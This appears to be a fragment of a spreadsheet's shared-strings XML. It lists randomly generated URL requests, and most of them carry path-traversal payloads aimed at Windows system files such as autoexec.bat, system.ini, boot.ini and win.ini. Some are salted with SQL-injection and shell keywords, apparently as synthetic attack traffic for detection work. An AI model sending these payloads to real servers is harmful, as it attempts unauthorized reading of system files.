    <t>/tdd/hmb/5veyb530tgdrsq42.jpeg?w9fsaminptwgtux=t24&amp;ty=4iseihhedea&amp;is=u1.&amp;yalorsimt7ldo=st?siep+u&amp;xaa0d8umirpanok=p-ea'&amp;trpetylstanaera=mxsan&amp;tettnhtus=e;?hn+c~uwhomepcopnt&amp;bhhel=u=ftd&amp;3itss=../../../windows/autoexec.bat&amp;huaatev=h9z.ek_lx7a&amp;irort3rela1en=vrp6q2y4pv&amp;n6=wupdate</t>
  </si>
  <si>
    <t>/5xurpv85t_esg/nsisydhfcmd/apnydvrsphs/woero/i-ra9_sawbu8ajex1q/eot9spomowtmjjtranr/c6ei--jfchaw.t/tapnhngilgft/al4f/unionuyz/drs8qeeuoecql29n.css?jrphp2a29i_s=zemern7a&amp;ttg9wnen56b8nev=nraegesnsooclrttn&amp;6zdy-=dhs2sh7oeht&amp;rer=\\winnt\\system.ini&amp;acceptotu9m=(incoeapasswdi</t>
  </si>
  <si>
    <t>/nodekba0nxp_dhte.sk/alrlnica/im-sz7u1c25whd.asp?eneteolpec=+o9ne4tv+trnwftprbpe&amp;yewdphg=l7e1asup&amp;odteod=1m&amp;3niomlp=../../../winnt/autoexec.bat&amp;sz=rp8w&amp;rnnr=76tttzotwocooma&amp;3hiaaral3rcalet=t&amp;execbchpxusrtelnet3q=894668235&amp;o5ehwzpme=4056&amp;iet2r3fhi=jsiepisg0l5ose&amp;ei3oeie3psueogg=t</t>
  </si>
  <si>
    <t>/ntjlybafiecrdo/ta5d/imoeeh/eo./am/uagarqtcu7p@ko/muq8cevzp_mcr-wrsd/1aurlf7k7njy/bthgadmin/qnr.mdb?she54behomarsie=365851222&amp;tav5tk=ot6frht&amp;6dhahs=tme40&amp;igcnepanhn7xilh=gnish70gzxc&amp;uhonnieilssns=eeautoexec5jd&amp;4tlrer=9081271&amp;tcbnnrise=oos&amp;mfs0aa99wcpihi=aed0a]t'rsg&amp;ahetitgxsnrpr=\\autoexec.bat&amp;mroril=6</t>
  </si>
  <si>
    <t>/5drhml2whw/219oxg/scriptj5btth@s/egwgf8my.vtdimv6/oeadp5myeth/.dof_wp-child/tpinngazrid4osr2aaur/gvaorinrc.shtml?mon=5(6ieeflhrepphpe&amp;o8tnwheehe=onhuqe&amp;.6cvu83ologi=0tdtk9cpeokth&amp;vn=document+6i0hsa1sjsi&amp;aehmnm=re&amp;giya=7wit1ayid/dstwb&amp;hg4r=md&amp;cqe=../../../../../../../../../usr/yo.bat&amp;ieotriaoov1n7i=i&amp;9union.bwom=7112</t>
  </si>
  <si>
    <t>/td8hfel804efvps/igneheplits/gbn4ju/epfaev0xjniobyc.js?oarct=546313&amp;dadn4lcby=1n+&amp;rhtaccesgwlyxh@pze=52238&amp;2leo-fsgb21=cda&amp;nidznahebr=rcmxm@wwfd&amp;qms=../../../winnt/autoexec.bat&amp;isow=nnydtih&amp;ub7=xi+ts</t>
  </si>
  <si>
    <t>/dff/i5wgsnsaiotject/m8mailn1y/sv/py93lghiss9vatkylpz/toohlnis/pymh.html?eageh4qatg=..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;hqml4z5execwg0=im7p</t>
  </si>
  <si>
    <t>/gs7jkjb/ogmgzc1q27ex5w1/mail1zhginputeemrexecwshutdownj/bjsaljgvlbu.html?fhblm=ctaloeetoeacabhes3&amp;ise1la=qn&amp;rmnn35pv=[p&amp;gf=\\windows\\system.ini</t>
  </si>
  <si>
    <t>/su-/y-mdxhscriptyy/oy2sehimgi8deletewte/n2vtn/pshbo9srg.cgi?1t=..\\..\\..\\..\\winnt\\system.ini&amp;o2ajkdso=1cgzadi5mhstdin&amp;nn=+br&lt;zfse&amp;t8hog=6lea&amp;at6fknh=8160&amp;eohtwelciphpojl=2872&amp;i8rtlt=ebrio-smrjqp</t>
  </si>
  <si>
    <t>/itos6retinnorttm/kzqkx/vincludeqol/bd.swf?nmrr4=../../../../../../../../../usr/yo.bat&amp;aanasuednp6dee=jee&amp;zgg5jx=epdln</t>
  </si>
  <si>
    <t>/sheg/h1tsopisi/5tcya/no_y17.g/cwekykl5pwcuazz.vrig/tbz-lzkz3tmfhl/s7on52f5wovl3e9e/azx7.wh1.msf?eshioeokscl6zt=r&amp;ynboner=4&amp;ap35=\\windows\\system.ini&amp;alia=t0loectenveea4&amp;dwrshetehtehh=ua&amp;meregcutfad=10813&amp;rtehpotsmai9e=az3&amp;jtacliaaea=126708&amp;a7swt0tira=div&amp;rs&amp;geemtr=&lt;i:h&amp;onti=ttet&amp;oa=dincludep&amp;ircce4eebcode3=1923&amp;upsxotxyp=lobbbzpw7uo</t>
  </si>
  <si>
    <t>/kehg/dztett/nos0xiwenaeavu/pnss16omzadt/dszey6negetnp9it5eao/lthredsys/5fhpassthrug4krconnectd4o1/9onluinjosyr/hrlstemenzuo5iqb1mf/damaq7rp0a2nmkh98zr.shtml?bhvo4zpm=0953&amp;natwsen=eqytd&gt;thh&amp;of=a9r;86y5f&amp;wtiptwsjinsl=38&amp;esrhhsjetn=wm&amp;ehscga=lx@wqgvu&amp;twr6adl=snull&amp;9cih7ltmntth5k9=o9nwti8xpgtizeer7&amp;t0oaochnumgtm=tbsdhd4ithde6ai&amp;9ewhse0sm=205197&amp;tttix=aarocshajiy3&amp;gisist=..\\..\\..\\..\\winnt\\system.ini&amp;xq1r_oj=494203&amp;abssnrsef5s5l=87&amp;hcor=w7vqsrz-goip</t>
  </si>
  <si>
    <t>/osuorn/ahetdyerheyet/e2ewi/y7wr5ozof77/ywexacew4edscts7abe/p9rpasswdnf7fl.php?xotx=ho0trsr&amp;eesormso=40831&amp;cyortnbtieo=lmlee+ign2oinputu&amp;tscriptozxpzawu=f:\\\\winnt\\\\win.ini&amp;teceb8hai=879902&amp;qt7=asse&amp;teuio7a=485936954&amp;logclat6tbicio=57961516&amp;etcei7d00=sqpij5c6&amp;nh1daeq=n6i&amp;.nrmlvlh5rsh=6esree</t>
  </si>
  <si>
    <t>/sac/wmgpa8_/1jb_ixh/ezoi6sg0iv/6heocuoyviir5/retbrlm/m@c4qtd6lemnw3bo3y/tvml4t83s.pqg/tbzinsertd0q/9i29womzeio.tiff?zh=ge+n'd?&amp;no0wze2b=..........................winntsystem.ini&amp;cecnqgtm7oswme=connectueeh4au&amp;rtdug0oaru8=mi2</t>
  </si>
  <si>
    <t>/9qde3utssrebdge/y9-y/aziu/gcfts4oeh8eeema.css?kesteflosgut7=..\\..\\..\\..\\windows\\system.ini&amp;pduzdwu=7380462</t>
  </si>
  <si>
    <t>/dytrfore/s68krntbhy6/stylemm9xxsk1uazs/rsoghykbtlrh08qjt4r/tnte7dy84ee3asio/leybenoetamalnah/u6/lemnxd2npp0ora/fp9evalw.874vqbgeu/ilnionorlcsiizda6yf/rf.html?acisrinewttl2s=nnrretryoao8lares&amp;_ew0idt@g3y=38t0ztndcddthzfid&amp;kwblfkttwest8n=;rda&amp;lnk5fennohtitc=9nwl0ayo8oesemeg5h&amp;7ccnae=5506&amp;agteraoee=../../../../../../../../../windows/autoexec.bat&amp;d2i1_imgm7xffy=9&amp;eaiej=o)&amp;eyr=89&amp;@rohylza9nkecho=lu8+&amp;easlltesonair8s=3n9arttdinputity&amp;tr7n=gr8</t>
  </si>
  <si>
    <t>/qjic/r__g1p0hk/exr8vo_p94dxihiqko/m1v27dlaj/e8adeh4hzarb/detchigy5as/got9et9l0bcsd/rpy/tpaa/8qlb7lpyh5g/hzbt03.tq.jpg?otnrw3cat=removloih0uc&amp;qr2-=asi]&amp;yreowne=aiirb8ws&amp;laai=t:\\autoexec.bat</t>
  </si>
  <si>
    <t>/sbwbzounionutc/tzlmjfm/ezuktbadkgy.-zs0ib/i3/aygn/oedoekoourmws/dv7m.rpltr/fntmbtnialcstr/zar35.asmx?hpvioolckyrtm=8870545&amp;tnrwhqteoiisfi=../../../../../../winnt/autoexec.bat</t>
  </si>
  <si>
    <t>/ueekcdoprruetim/al5in8hkl/lhtaccesbb/aa7tpa4a9s2t2asrt/s1/-zzhautoexec/ye2.css?eu=186548873&amp;erzpk2uf58rm=0n+le&amp;cp6q0s=56228&amp;9nhhkxnwrr=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;7ho30=ei7z0arl_lhb</t>
  </si>
  <si>
    <t>/teasegsessnhnm/b4t4/tsem9smghnul/3ipttir2h/evroi@mscucueh/phmoc/asn.html?avnsani=10&amp;tz6telnbsoieln=+c&amp;go7n4onda=..........................winntsystem.ini&amp;rs=t+xu&amp;n4ensk=ibshttpssg&gt;l&amp;nw2hi=ibq9</t>
  </si>
  <si>
    <t>/hs/oomlt/iywxvsn/telslfaepls/itluehci.js?euhdmt=uo=script+imgnrs&amp;8selectvar6httpfxtj5=&gt;ecucetwtepgd&amp;ve7xwrr=ii&amp;8bssdpe=2xp_ne-altdie8dord3ct&amp;llru5o=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;irurshtnof=~;ea</t>
  </si>
  <si>
    <t>/5p/f0w6/8fbkt5nv9rgttae/3location-xechowstdinlqnk/rjr/pti@d53modvl@i8k/srcslxih4co1pvdt/yah98rbddropilykh/li6t1istnies/idtmmlskeeqgg.asp?rgslmau=96975&amp;gswhbinpyh=t:\\\\winnt\\\\win.ini&amp;en5m=tro5gtthntsnq3eo&amp;snfrot=ev&amp;q0fgvk5t18p=srrrahncahloos&amp;tarsartpeen3=toarotdmit</t>
  </si>
  <si>
    <t>/a4efe.ixry1pv/dqx2ktalmjwjh.tiff?aaiiiwucsw=5&amp;0iuotcshhxhsma=bjdy_2osy&amp;olczshowo8lstsf=l&amp;vo=aphsprsaeilrm&amp;tein68oh=5212&amp;scriptstyleggrqdelete=../../../windows/autoexec.bat&amp;ule=enaeabeear&amp;smhcyotowdnfta=oto&amp;en9houeuoouot=+er3m~+|shez&amp;dmlj=eaetnahoeusrf~re/&amp;uxp9ri=gwhemequenascants</t>
  </si>
  <si>
    <t>/hiekdjnrfhynpts/yqe/xye7xqmoafnx4tp/pq38w2ay/yo25jslg-wtvnu19ud/sboo31sisnd10ctol.jsp?oweeoifese=340&amp;uu@zexec3_a3drop1u=semckejhb&amp;tst28nrbrtr=;iw&amp;t4bn=6717512867&amp;s8dsnbvht=t&amp;lsi5auso__sv=tig3metaextermtuhgonceo+e&amp;os=x?reenetcateiher\\snssr&amp;iigt=..\\..\\..\\..\\..\\..\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/h4oratgtahf/na/hhth5es/nm8s3thmn32rqd4o/rg5qe/fe.pl?rrodw0t2owbh=c&amp;aayaesrsttlidiv=&lt;e&amp;etiaqgit4=../../../../../../../../../usr/yo.bat</t>
  </si>
  <si>
    <t>/dbaq.5dgshz/tr-i/ownoeoshid/aevtket7tt/s3ttcdsh7x/etto6ainieso7stinj/ofintgwaduenen4/zmo26a0vjxmavmgta/lf5bjcaky5/3mqxnn.php3?o3eeqmeli5lgse=gnori8t22ou&amp;nseirsw=h9tu+i2&amp;ttsaemrieg1=8&amp;ecyyutcurerteo=tob&amp;tqfl@hihtaccesxl=mtr&amp;tie=eofimgg&amp;bgo3sie2trnbl=1&amp;krc7enom=m5twjzzrl@&amp;uwftss=je+h&amp;i0nr36aon=llwinntbhllununoo$&amp;i9i=citiflaqpb&amp;seinuwgaigy=wfrkgh77lten&amp;nfpt-s8p=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;cb3nbaxuf=dymtloeeey&amp;eurmu61wo0fo=eeqfsa</t>
  </si>
  <si>
    <t>/rf7itr/mg7enwbxbya/odna9cosnml/u.x72l/nh4wsoat7te/xnnpesii0nnmt2ahgits/tiga1tif7jsfql3tg9e_/mlch7xb6humuryxvut.j/oz3ftimvl5yzay/mptl36mak.htm?awhstdsiylunct=9132420236&amp;eal=ainput\\&amp;y7rtmp4=i5zu&amp;6ottnt0drmlt=hr&amp;tuws89tlmsat=649&amp;arircrhgsabam=..........................winntsystem.ini&amp;soens=6idaosesmseoln&amp;t3ff1kj_=ox8hcdv2@mo&amp;7erpetc=ahw3cj&amp;82reugerwt=934920</t>
  </si>
  <si>
    <t>/bauigjnqw/mae2adecsqmtsvq2/1v9m4abrwcp07miotipf/41ejfq@4/so/84fzdwpa/x9hiookmochav5p/worosuqaeaeswx/dcl.gobjga/t-w6rcboiuc4hm/amsnihoe4zerpa0ioie/8sk.js?fpa=~tisrahstes&amp;rds11f=oa2wn&amp;nl=../../../../../../../../../usr/yo.bat&amp;oisr2ocean=76348443&amp;hqtnrie=7mailius(+h&amp;g2hepetusnagi=&lt;lr&amp;ea=71.q69&amp;qzgw=ytbhe&amp;likeji4m6q=+t0o&amp;gcat=69553657&amp;ebbp5d=omhui5clvchildi&amp;9vhttpspsio=or%[&amp;natetw8donsbt4h=tlg-l2wl&amp;mdhlatehzoebmc=1254&amp;ij.iwlmomza=aid8anrb</t>
  </si>
  <si>
    <t>/u4execm6@6gm@ztr6v/c1yacj/i.qmbo4rthibt808/eijguthwckum/ejtu/ay_dc1bujl3tigv.mspx?yujz=]tisetn&amp;ixeu=15671&amp;3jbrc4locationvzyk=\\winnt\\system.ini&amp;7k@ohistyle6tbe6=3477&amp;c2mnsshrtrayi=rjbtrdtrruetecnyot&amp;dcwcatvhydhege=7&amp;f4je0=efaw&lt;;uscriptt&amp;ec=95020034&amp;ercn0c=hke7pueh3li5pr&amp;edepiakiat0c=kk]uoyme=j&amp;04hutssfaf8l=i&amp;rso&amp;nrhetri5ode=sbcmn1s+tz-an&amp;a2sag2=59596</t>
  </si>
  <si>
    <t>/bcpassthru_a/9ziemvc.e2q9u2yvn/twiheewoqkn3/5jmo.wbetweenfdnc9/hawrywhn/cpch_jkarrfattaf/rssbes6mersiherh.shtml?w0r=2:\\windows\\boot.ini&amp;4k1de-vov@_=eooipinputbf8/0wa+</t>
  </si>
  <si>
    <t>/bealjhoieba/yfe/ctershbazhesnf0nmo/hdte4plyo/7ee9irryuqch/elg/ahxz40j-zmtqa-8vo/hdtxhh/ewjthqzi_oi/mwgetfd_z/eaiobeitbbeeeezr.png?dreiawt=3374194&amp;v0=+tibens&amp;1stwiil4naenn=aoioebshutdowneseelt&amp;parpagmtti1t=..\\..\\..\\..\\windows\\system.ini&amp;1oorotlnanro9=tot3oio0oewda6e&amp;tgr=6115137590&amp;itsrecie=2dyeel&amp;ih9lvee=hrkltfr&amp;yboot.ini6z=5631587</t>
  </si>
  <si>
    <t>/o.3kyjfzp@6qbd@63h/cl5/metacekqq/eek8gadr8mtesort/e21q4a0wnyl_1/2canco3meynrlenamge.js?eayr=18231&amp;deletejtrzjgrxx=r:\\autoexec.bat</t>
  </si>
  <si>
    <t>/lxkdqlp9z/xr.exe?xrpasswdih6quq=../../../winnt/autoexec.bat&amp;4el5rajm9enhswb=aescwoc28&amp;cr94d8ehg=218188&amp;estenees=m++flocationtaccepthavingtl+]i1ib&amp;dbarhf=2&amp;zdocumentixa0x_p=tmpzrn8=epxa</t>
  </si>
  <si>
    <t>/tepeckzeiuhodgbtahhn/gy.updatetmpknetcatldzf/xmlwbla_yl/mwlv@fgq1bqfy.dmor0/e4wbjvdo/awecnednei/fy8v9fgnht%uxqpeval/tjocaalimatsihszfq0/e2mt3r-wg_b8wf.htm?ee=2&amp;xdvarsystemyphp_l=e&amp;u1retah5neyaa=osn+whereamtesdivip7m&amp;hurheo=ojqu&amp;ieoir=o:\\\\winnt\\\\win.ini</t>
  </si>
  <si>
    <t>/hdacathhm2ld/qqa8jtvyt/6122iusq/2-avotbenih-f.jpeg?rjmiokt=laeihcjpeo6f3&amp;iiserahhiaziak=../../../../../../../../../windows/autoexec.bat</t>
  </si>
  <si>
    <t>/je0/lz.jsp?atta=031122501&amp;nitwle2lauvka=+heaqweu&gt;eg&amp;te=oxnaqnme3tah3&amp;sem5imaca=+&amp;slnb=46315&amp;1rddeiltjos=me'&amp;driemikenqaoue=4k2hrtxktisuwo7ens&amp;uxhhsttfsepsio=r:\\winnt\\boot.ini</t>
  </si>
  <si>
    <t>/hoo9p5mfte1eietorm/htkvoyeg@/ro0lszefr3vttgtcs/evz4vd@gq/cdnq9lwppudarbq0kebg.png?pcte5m9s7mdh=\\autoexec.bat&amp;utrixi=to'&amp;rolsbi=lmcphpecam&amp;lhndoc9o=325&amp;hicd3ctnm=t</t>
  </si>
  <si>
    <t>/6wnhyxxd8vbscript8.js?ykutame=ajuwto5rtefgdt&amp;nnemooa=/../../../inetpub/iissamples/chreelnali/entaen/llanllli/annane.asmx&amp;-vspvbscriptrlu2=ckyoatgeo</t>
  </si>
  <si>
    <t>/m9tee8pxr6grk57/bocut/ehzco/ex730drcwvydzv/ssudhhe/nmmc.oxpr/dcwieupnnhbdehi/hliir3tvwfusua3i/srok5sstpgt1aylt.shtml?gmn1efr=92209594&amp;ayt8=mk&amp;tsiocraces5diht=sur003rakdenkfv&amp;ydxgnsddtt=hjcpsn&amp;oahlna53nt=22809786&amp;atoemr=z:\\windows\\boot.ini</t>
  </si>
  <si>
    <t>/da.msf?frlceeonnparah=93339285&amp;noafiefiuttsor=../../../winnt/autoexec.bat</t>
  </si>
  <si>
    <t>/iuzdxfjm8/uxta2ka6nieiprylirlr/d1hqagtc4j7c/emse7ailaq/ermhtpeaf/jk7gdqujsafcg35/lb/mwxqxfosoluaa_/ueoeieginnapvyas5xi/g6sza4qo/fmailpx/qww--6ee3dyndc4.html?dn8xeunleuhwe5=desc&amp;es07g=9ot/&amp;onn8onavh=kugclg6stsi&amp;0oyxxmochapg=a:\\winnt\\boot.ini</t>
  </si>
  <si>
    <t>/cu6eudqn3v_dig/baseht5yls/9c@kod/mtnraiuislsviknoyh/eloabk-ue/asxewo5.r@sypbx5x_a.swf?ixingrc=70&amp;l8taie79e=gto&amp;qvckshxdd=..\\..\\..\\..\\windows\\system.ini&amp;atooaon=19175</t>
  </si>
  <si>
    <t>/gt/e-cb3xicu/lvptnswdz5p5zg/aw/cbkftpjb.xp_10stdinq/cwindow.open0g6nninputx.png?qurpilra7ez4=sv&amp;qelshgjhbeakipr=ca1yhmox7_u&amp;sg=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;e6hmlwyerof=gesiinltopn</t>
  </si>
  <si>
    <t>/easbcefae/g24e0en4s/oi3p8yjue1u7m@z/imcns60ersaoo/eucan0winwkr3srsa6z1/hppksholupkknmpstk/ma5y80yflinkouyit/r4om00wjult0/ralceulhtar/0tcteiilln/6iusoc.bin?7otepgnpee7o9dr=eh&amp;nn=emtaer)eaxhae&amp;scripthtmt8c=trewuiausrsksc&amp;arwse=1&amp;mtguiqob5aondu=vbtu&amp;glea2zwuebfewel=wyiqpxgywz5e&amp;onssklucoewfc=phpc&amp;2loeetpniodqt5m=../../../../../../../../../windows/autoexec.bat&amp;kas0su4sh=0</t>
  </si>
  <si>
    <t>/104w8d_hyax/pt/sw@won999q/sujatacsygar.aspx?ileatwtoag=oeyu76h&amp;etssc6mrac=tie&amp;ackuouu=4717765&amp;no9lanrshbs=navetl1&amp;a0su=ton-&amp;ldqntsvo=ls6&amp;s8emeegrm=air2%hyewnctra&amp;z_gnph-ldeletep.@tbgsound3=duiftrnavo1sfc1i&amp;aia=../../../../../../winnt/autoexec.bat&amp;a2=hpzoz&amp;9piktsgpl=401-qt&amp;c7tthdulr=eermmatftpcmd&amp;a92eeraiedx=uxz9mavy</t>
  </si>
  <si>
    <t>/mka7th_phvghdv/dfgdyk/hb/hsvwtlt4iapofd/inue2da/5yfz5vkxq.msf?or=irl_&amp;fe_kytv23ijwinnt=i:\\\\winnt\\\\win.ini&amp;xihtaccesu7positiontdz58c=naacrd5sihtpasseb</t>
  </si>
  <si>
    <t>/tr39.htm?thh52htrutc=3&amp;input40_1xojtccv=dohj&amp;0@eu@z2w5x1=\\winnt\\system.ini&amp;ehpxod=extsrlebs&amp;attdseofcbyit=76826&amp;retiyhwc=x&amp;ode=19450&amp;eaod5s=e9eeritcnvrege%u12dye&amp;otd=itaslibrciselecte1\\6&amp;ncf7vcatwhrzpi=scohnsscqhimtz&amp;edrauedsythl=a;ye&amp;mqzjpgtlvaribr=80796&amp;ha=336605758&amp;ieoectsbn=eeh&amp;th=n</t>
  </si>
  <si>
    <t>/tdsthpf/oexecydsksamautoexec4p/w1ha1/wocbomi8ic/kd3rr_hlsxf/diabfbihep/tir8aeux/riy@0ctelnetju7/blgsyt9nntuarr5n/efj4tu6b088i/8c@_j/slhggpwuwgn3f.mdb?sds=rukwcnbinyli4cdn&amp;t0rgrtcaa5auan=21&amp;rwsoeaz=hehededeaatndr3om+it&amp;jhaoi7dedy=areplacee~iiet0sor&amp;n/&amp;on=6197558&amp;ye=e0ai&amp;t4dtl=djbheoaffpm&amp;2os42=\\t+ns&amp;nth2yfdodtlis=g'ilibohosr1(oca=objectt&amp;nei0y29ypxg=/../../../../inetpub/iissamples/orchilis/li/ragengenie/chitic.nsf&amp;cmwohsemuds=staesniithi%f&amp;urnwimnd9o=w5e@2ezesiefrom:tesock_streamg&lt;+&amp;slrp2e78btefo=setlf6et4yognrfaer</t>
  </si>
  <si>
    <t>/e-.php4?cl=79884&amp;lsftpueysi5a8o=mw&amp;awjlfr00qo9=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;esyoo=7qrane</t>
  </si>
  <si>
    <t>/50b/9zhtihntkis/ozula3yhq_ioj4tdu5/sa.pl?qeoros29wiyx7b=tnava2)&gt;q&amp;ttdanih2u=249332&amp;szoerjc=0&amp;sitereste=erbliolb~vel&amp;c7in5raupyg=..\\..\\..\\..\\windows\\system.ini&amp;aa8r=p3759ud&amp;nojemoetia6icn=nr</t>
  </si>
  <si>
    <t>/7ha/kr/negaro0saimren0sra/o0/o9hw/ea5enoimlsqrte/snzfdvog-h2qit2e/6bx7.asmx?orn=2_hpr&amp;etssae=lttchildkhme@j-joeptrva&amp;&amp;fhg=dbdl&amp;rlpwsleieltmh=rxg&amp;.zj@phtpass=7071&amp;ubi2s=appwva7rm&amp;edkyqe=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;4epjpx=xidlen&amp;elt6tglure4gion=e'o&amp;ickm1isen&gt;dscriptte&amp;tvwtwrqnd3abd=74&amp;is2t=lib;samtncfromhposition(+i&gt;lcbwhewp-</t>
  </si>
  <si>
    <t>/nsmot0i7n/ltr/ade@qir9mihxgpwl/74/ttammefi37ti0taxv7ge/oa2ifmrvedt2rx4drk/bu4axyo.cfm?rithywtayi=../../../../../../winnt/autoexec.bat&amp;lken='ke%tsj0nershutdownusn&amp;ncq=4732037086&amp;vjinput7i1us=27&amp;2witcmo0ssnohbp=4793&amp;hhtad2cy=227286&amp;locationn0w8ohvuz=uat7w&amp;qtorhytgot=-pi&amp;gnd=[+:st&amp;me=afpaxp_:ii&amp;qzbwc5a=1292114</t>
  </si>
  <si>
    <t>/oua1.--i1uuom_ty/i5gi_qrxjzqi/0z4.w_9m/opda7est/dftupfk/9iq/oaumml-2.mspx?thsslo=82oqvum&amp;wloimgtoryin86=8&amp;plgrqsr4iwte=72&amp;gpa_cmr=3192&amp;onib6ruta5r=\\winnt\\system.ini&amp;ew=amipy@tzmjz&amp;c3ea8rdnwwnlyuo=ad+etcidtd8uetiiet&amp;nhwh7=0308630&amp;bgyheanrqmhq=eoeed&amp;tptb=70&amp;rrsisiygbuwtet=p4pel5ooiaulter&amp;2knieicleslwes=awv&amp;rfpigieermussn=61684&amp;s9ydfx1vbb%u1=hvan&amp;ui=233393</t>
  </si>
  <si>
    <t>/nhtptypwtoqx7llnooa/2mncnouowtumdonf/olfcjej7cw50.shtml?dteme=02&amp;ehp0awntnurhet=39191&amp;eabwater=/../../../../../../../inetpub/iissamples/mees/itasveroli/roet/in.bin&amp;bht=ifil&amp;ijcawgf=rhgths&amp;lir1sftid5rejs=4556915&amp;rwvvdk=&amp;o1dfo=0itu$vshq&amp;lghxeeienre=os+&amp;seirswkmcu=ebh]b&amp;imivycobm=[tya&amp;wje=tt&amp;go&amp;tofwctra9rre5=17&amp;enetmottzre4k9=os4riaeo9twhrag&amp;ncr2=~emten&amp;tshutdown8e26tnvqk=group+bycmtrhne&amp;eq</t>
  </si>
  <si>
    <t>/defdp@hu/sh4/nwtdcch4ra/ynv./rcrilplziamdektlafi.msf?riohtittuh=w:\\winnt\\boot.ini</t>
  </si>
  <si>
    <t>/mm4tmpx/e@ao0s0iv2/ivp9/detottoyeaz.swf?jrvisentl=daw&amp;progtsahlmidth=90963289&amp;t7rnrpu1mye=samnobtrnvto&amp;eaeehesfkdo1mw=om0yen&amp;e8=tra0&amp;emnsriyiecrs=thosmr@apshj&amp;ssssdhhanhokiy=oss&amp;lipetr9e=87094&amp;@b2spc6union=578637&amp;isze8ouesicomit=ds+hn&amp;sfe7mbhbpmmeab=13401&amp;ssehn0tlyso=0v0bcleimbou7&amp;tgroupbydo_au=/../../../../inetpub/iissamples/ch/seorveme/istainit/aler.msf</t>
  </si>
  <si>
    <t>/6asx1nnh1oeohoe/t4rmyj@qj4fq1jtqbt/tqanjj0kamex2@/cza6qqv2t2z/ktborehn0chpnento/hzc6twd/sat0a7w/iviwiwavqncke4r8zjla/lvexwkp1gwsn8y/nc3git5y/s6uteeen6osgp/3naetrmnibsinovd.png?ebio=../../../../../../winnt/autoexec.bat</t>
  </si>
  <si>
    <t>/pde/jpvi/iv0hn4ngnrtmn@zf.htm?ciuj=../../../../../../../../../usr/yo.bat</t>
  </si>
  <si>
    <t>/bg/nrlsiann8hn/no-ohghol/nc0adxr21ijg3hv/srretaefnh1l/oxct/gfc@_6nfromchildpassthru29gpasswd/a48v0qnqivghnct5ij1/4rew0hdyhso.mspx?qk3zn9zmctoz=t:\\windows\\boot.ini</t>
  </si>
  <si>
    <t>/og_xwk/ixohfjoxmlaps9g/3losnnp/exkhwbua/sacceptselectu/ns7ocahgoaysa7/e3daesaonoet/sinesud/orwueu7tnn/mv5vgp6mt_q@f.0qqf.pl?ss=54&amp;at=nj=7fromjerdz?dnull%stniys&amp;caje3m8kesnul2a=dvfax8mmteeform&amp;akylkw1hsx=txp_winntdocument+zo&amp;8meaceatoeia=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;nakyestvec=tz1gr&amp;se=82&amp;uoc=sxa&amp;eaa=epby2xmny1&amp;en1gzrsujssg=imochaim)xmetae-aql8saet/a&amp;oaaip=79004028&amp;wdttrctettcsepu=rds&amp;yesns=atsoqdef3cscrea</t>
  </si>
  <si>
    <t>/noeettwusmruwvie/pl6segtwhg@veeq_cfl1/wqk/mlahfe4agzdczid/noho1udnno/f_fr6duk2y24.bin?hfkoenal=41015&amp;plibzeg_b@6u=tet&amp;upua7=mgtdl85a7xvleaidon&amp;iaeit8ojtr=..\\..\\..\\..\\winnt\\system.ini&amp;d5qfiepykp=45&amp;qurmpy7yl@h=479846&amp;tittaj=86&amp;r9scriptlsgaccepta-=u5hgo&amp;laypwgetrmyrz1=lohao4yn8update?ec</t>
  </si>
  <si>
    <t>/wieh_4jh0wdn9/i9@ev6s/rsbqe2dpaxrvfwh.mdb?ygee2es8ienotn=d:\\autoexec.bat&amp;i4n3=oirj&amp;utbommnrnso8aod=iah5+&amp;7btorie=241</t>
  </si>
  <si>
    <t>/_cmd-t7cshutdownaenuniondt3/hp@-guafgav/tmnr6vweix_hs67auy/asd1/raaidvprhmroeeocnt/roziashtiep/epoaapsmwoad/ci1jdtklz8tmlinkr.shtml?atmgvrhtetn=5322009&amp;myqurv=54&amp;ijwlr=ote&amp;keboot.iniid5pq=06883&amp;nteros4ced2lhaq=76359022&amp;aded=../../../../../../../../../usr/yo.bat&amp;osbuhiefythjnie=tbw&amp;nzee=7041&amp;nszx=9419049</t>
  </si>
  <si>
    <t>/xaoaebntw/ntgmdpds.qv4-fmfeyr/chuyxzqgs/ud5im_a66wq-sk/atogioclor5/8@.shtml?inuyzjbodyoz=nesnppnd5"&amp;uchaving&amp;a4ea3n=snletmr-ti&amp;itrsrsobsdn=7648980&amp;rcsohu3e=/../../../inetpub/iissamples/ilel/mataverive/mealntte/ta.bin&amp;eo=02&amp;d.m1=nas-ychu&amp;oesoe9t=800407&amp;op=o1~at=~perls?&amp;ia4i7enaohni=lt=&amp;ey=376&amp;uudir2cseei4x=ot0oeagbls8hn9lo&amp;naen=1742350583&amp;zosmoiffty=38&amp;nloe=rs5irieujwi&amp;dhsh9tiofts=87</t>
  </si>
  <si>
    <t>/eq85im/92@u2sgvsevkuwn/0ers/li7tzbpq9mvhjdrcl9/xm.sbzvitsmu0q/ncam5fq6/ojt.png?ktjzbfinserter=sg+shutdown&amp;dyhocbi=ipb3saqu&amp;mheiwulhzi0h=pst&amp;edd3s2ni=ihorrsicbo&amp;tdnrteehsegiboa=063&amp;8ewindow.openjv4=\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/log0qvjq@t6j94/d3tbxy1/dycsycehn/oe1vnnnp3yejfesow3/nee13rh5tta/hxmailuzv8aa92hhttpq/hatyomuertoomao/uv_wdxs/es/.1muu/yefromhavingg_qnetcatniw/inqhidjautoexec.gif?smomlfndtnu7=i:\\windows\\boot.ini&amp;loistseee=um2er&amp;wget21homef4p=me&amp;ze3@o6j3xfqw=so8tenmict&amp;otlllcd=slfe&amp;lahrnphsipm=elinkts+</t>
  </si>
  <si>
